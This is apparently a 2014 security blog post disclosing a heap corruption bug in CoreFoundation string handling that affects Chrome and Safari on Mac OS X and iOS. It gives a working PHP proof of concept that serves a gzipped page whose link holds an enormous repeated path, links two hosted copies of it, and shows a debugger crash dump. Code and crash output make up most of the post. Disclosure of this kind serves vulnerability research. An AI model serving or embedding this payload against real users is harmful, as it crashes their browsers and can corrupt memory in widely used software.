Archive for August 2014

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash.

PoC 1 –> http://ibrahimbalic.com/ios2/

PoC 2 –> http://ibrahimbalic.com/nets/

PHP code:

<?php
ob_start(“ob_gzhandler”);
$ax = str_repeat(“aa/aa/./a”,2000000);
?>
<html>
<head>
</head>
<body>
<a http://<?php echo $ax;?>” id=”test”>test</a>
</body>
</html>

 

 

Crash:

Expected Results:
0:000:x86> .frame /r
00 0042e294 60b8cdfc CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
0:000:x86> ub .
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x73:
60b982ba c3 ret
60b982bb 33c0 xor eax,eax
60b982bd 3944240c cmp dword ptr [esp+0Ch],eax
60b982c1 7e1f jle CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x9b (60b982e2)
60b982c3 8b4c2404 mov ecx,dword ptr [esp+4]
60b982c7 0fb60c08 movzx ecx,byte ptr [eax+ecx]
60b982cb 668b0c4dc898c260 mov cx,word ptr CoreFoundation!_CFDefaultEightBitStringEncoding+0x1a8 (60c298c8)[ecx*2]
60b982d3 8b542408 mov edx,dword ptr [esp+8]